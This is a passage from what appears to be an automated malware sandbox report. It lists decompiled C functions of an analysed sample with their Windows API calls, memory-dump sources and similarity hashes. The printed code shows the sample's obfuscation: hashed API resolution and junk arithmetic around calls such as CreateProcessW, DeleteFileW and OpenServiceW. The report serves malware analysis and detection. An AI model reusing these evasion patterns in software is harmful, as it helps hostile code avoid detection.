				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002807A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x0027c6e1
                                                      0x0027c6e6
                                                      0x0027c6f0
                                                      0x0027c6fc
                                                      0x0027c703
                                                      0x0027c706
                                                      0x0027c70d
                                                      0x0027c711
                                                      0x0027c715
                                                      0x0027c71c
                                                      0x0027c723
                                                      0x0027c72a
                                                      0x0027c731
                                                      0x0027c738
                                                      0x0027c751
                                                      0x0027c762
                                                      0x0027c768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0027C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 4934cc63de34540049d58cd22dfaecafe2c44dd235de8f7cee2a288c4fcd6884
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 8F1133B290222DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00271000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00271000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0027602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002807A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x00271006
                                                      0x00271009
                                                      0x0027100c
                                                      0x00271011
                                                      0x00271016
                                                      0x0027101d
                                                      0x00271026
                                                      0x0027102d
                                                      0x00271034
                                                      0x0027103b
                                                      0x00271047
                                                      0x0027104f
                                                      0x00271057
                                                      0x0027105e
                                                      0x00271065
                                                      0x0027106c
                                                      0x00271073
                                                      0x00271077
                                                      0x0027108b
                                                      0x00271096
                                                      0x0027109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00271096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: cb5d1f7e7c77c56ae6f7c60883998667d5e1ccb51de3edb52ae8abe7d7fdd84a
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: F7015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00274859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00274859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002807A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x0027485e
                                                      0x0027487a
                                                      0x0027487d
                                                      0x00274884
                                                      0x0027488b
                                                      0x00274892
                                                      0x0027489d
                                                      0x002748a0
                                                      0x002748ad
                                                      0x002748b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 002748B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 29cc95b77f91dd26d4372fbf7ca8f9429afc5be4d3e0f6f1ef3b1c709b7f5037
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 83F017B0A15209FBDB44CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00284F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E00284F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002807A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x00284f80
                                                      0x00284f81
                                                      0x00284f82
                                                      0x00284f86
                                                      0x00284f87
                                                      0x00284f8c
                                                      0x00284fa5
                                                      0x00284fa8
                                                      0x00284faf
                                                      0x00284fb6
                                                      0x00284fc7
                                                      0x00284fca
                                                      0x00284fd7
                                                      0x00284fe2
                                                      0x00284fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 00284FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 81d8b0cbe170351add54bc97a8067ea70379330acb0679ff67c19b6f1c515823
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: F2F037B081220CFFDB04EFA4D98689EBFBAEB44300F208199E808AB250D3715B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0028976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E0028976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002807A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x00289772
                                                      0x00289773
                                                      0x00289778
                                                      0x0028977a
                                                      0x0028977b
                                                      0x0028977e
                                                      0x0028977f
                                                      0x00289782
                                                      0x00289785
                                                      0x00289788
                                                      0x00289789
                                                      0x0028978c
                                                      0x0028978f
                                                      0x00289790
                                                      0x00289791
                                                      0x00289794
                                                      0x00289797
                                                      0x0028979a
                                                      0x0028979d
                                                      0x002897a0
                                                      0x002897a3
                                                      0x002897a6
                                                      0x002897a7
                                                      0x002897a8
                                                      0x002897ad
                                                      0x002897b7
                                                      0x002897c3
                                                      0x002897ca
                                                      0x002897d1
                                                      0x002897d8
                                                      0x002897df
                                                      0x002897e3
                                                      0x002897fc
                                                      0x00289816
                                                      0x0028981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(0027591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0027591A), ref: 00289816
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 71d372d6eeb36552ba429c1e51a1e5a4d21d2ea10996de98c2c02c4b4e0f3351
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: B511B372911148BFDF599F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0027B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E0027B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0027602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002807A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x0027b569
                                                      0x0027b56a
                                                      0x0027b56d
                                                      0x0027b572
                                                      0x0027b574
                                                      0x0027b577
                                                      0x0027b57a
                                                      0x0027b57d
                                                      0x0027b580
                                                      0x0027b583
                                                      0x0027b586
                                                      0x0027b587
                                                      0x0027b58a
                                                      0x0027b58d
                                                      0x0027b590
                                                      0x0027b593
                                                      0x0027b594
                                                      0x0027b595
                                                      0x0027b59a
                                                      0x0027b5a4
                                                      0x0027b5b8
                                                      0x0027b5c0
                                                      0x0027b5c4
                                                      0x0027b5cb
                                                      0x0027b5d2
                                                      0x0027b5d9
                                                      0x0027b5e6
                                                      0x0027b5fd
                                                      0x0027b604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(00280668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00280668,?,?,?,?), ref: 0027B5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 6a5fb35de188177de2f78cb3aff3be9eb9857be4b73b987a09397710c5cca1f6
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 5211B272801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0028981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0028981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0027602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002807A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x00289821
                                                      0x00289822
                                                      0x00289825
                                                      0x00289828
                                                      0x0028982a
                                                      0x0028982c
                                                      0x0028982f
                                                      0x00289832
                                                      0x00289835
                                                      0x00289836
                                                      0x00289837
                                                      0x0028983c
                                                      0x00289855
                                                      0x00289858
                                                      0x0028985f
                                                      0x00289866
                                                      0x0028986d
                                                      0x00289874
                                                      0x0028987b
                                                      0x0028988e
                                                      0x0028989b
                                                      0x002898a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002787F2,0000CAAE,0000510C,AD82F196), ref: 0028989B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 48b4110e36b1443f9121bbed435ee8175c118321d8aafb5fc0ad7413a4ade397
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 7D019A76801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00287BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00287BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002807A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x00287bf7
                                                      0x00287bf8
                                                      0x00287bfa
                                                      0x00287bfd
                                                      0x00287bff
                                                      0x00287c02
                                                      0x00287c06
                                                      0x00287c07
                                                      0x00287c0f
                                                      0x00287c1d
                                                      0x00287c25
                                                      0x00287c2d
                                                      0x00287c31
                                                      0x00287c38
                                                      0x00287c3f
                                                      0x00287c46
                                                      0x00287c4a
                                                      0x00287c5e
                                                      0x00287c67
                                                      0x00287c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00287C67
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: c88058e3f956a201e62ac8fefa26631285943e80a9dd8f5ce2b7d9d9758d511d
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 56014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0027F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E0027F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002807A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x0027f662
                                                      0x0027f663
                                                      0x0027f665
                                                      0x0027f668
                                                      0x0027f66a
                                                      0x0027f66d
                                                      0x0027f670
                                                      0x0027f673
                                                      0x0027f677
                                                      0x0027f678
                                                      0x0027f67d
                                                      0x0027f687
                                                      0x0027f693
                                                      0x0027f69a
                                                      0x0027f6a1
                                                      0x0027f6a5
                                                      0x0027f6a9
                                                      0x0027f6b0
                                                      0x0027f6c9
                                                      0x0027f6d8
                                                      0x0027f6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0027F6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 4a315a5291038ea88c2fb2798cf444c4ab9c44c8d5ed0b15817a42d35b9cb1eb
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: CB01E5B6901208BFEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E21DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0027B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0027B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0027602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002807A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x0027b6f3
                                                      0x0027b6f8
                                                      0x0027b702
                                                      0x0027b70b
                                                      0x0027b712
                                                      0x0027b719
                                                      0x0027b720
                                                      0x0027b727
                                                      0x0027b72e
                                                      0x0027b747
                                                      0x0027b759
                                                      0x0027b75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0027B759
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 39425e63c0c223bbfd320331d13a9d3338563cc64aed30bfe319847f9b174ec7
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 120178B6941308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0028AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0028AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002807A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x0028aa3f
                                                      0x0028aa40
                                                      0x0028aa41
                                                      0x0028aa44
                                                      0x0028aa47
                                                      0x0028aa4b
                                                      0x0028aa4c
                                                      0x0028aa51
                                                      0x0028aa5b
                                                      0x0028aa64
                                                      0x0028aa68
                                                      0x0028aa6f
                                                      0x0028aa76
                                                      0x0028aa8d
                                                      0x0028aa90
                                                      0x0028aa9d
                                                      0x0028aaa8
                                                      0x0028aaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0028AAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: de235b87c96ac636f0eef76f87fa29bbb056d4babdaad4044c6ed165612fae49
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 8CF069B591020CFFDF08EF94DD4A89EBFB4EB44304F108088F805A6250D3B29B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00275FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E00275FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0027602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002807A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x00275fb5
                                                      0x00275fb6
                                                      0x00275fb7
                                                      0x00275fbb
                                                      0x00275fbc
                                                      0x00275fc1
                                                      0x00275fcb
                                                      0x00275fd7
                                                      0x00275fde
                                                      0x00275fe5
                                                      0x00275ffc
                                                      0x00275fff
                                                      0x00276006
                                                      0x0027600d
                                                      0x0027601a
                                                      0x00276025
                                                      0x0027602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00276025
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
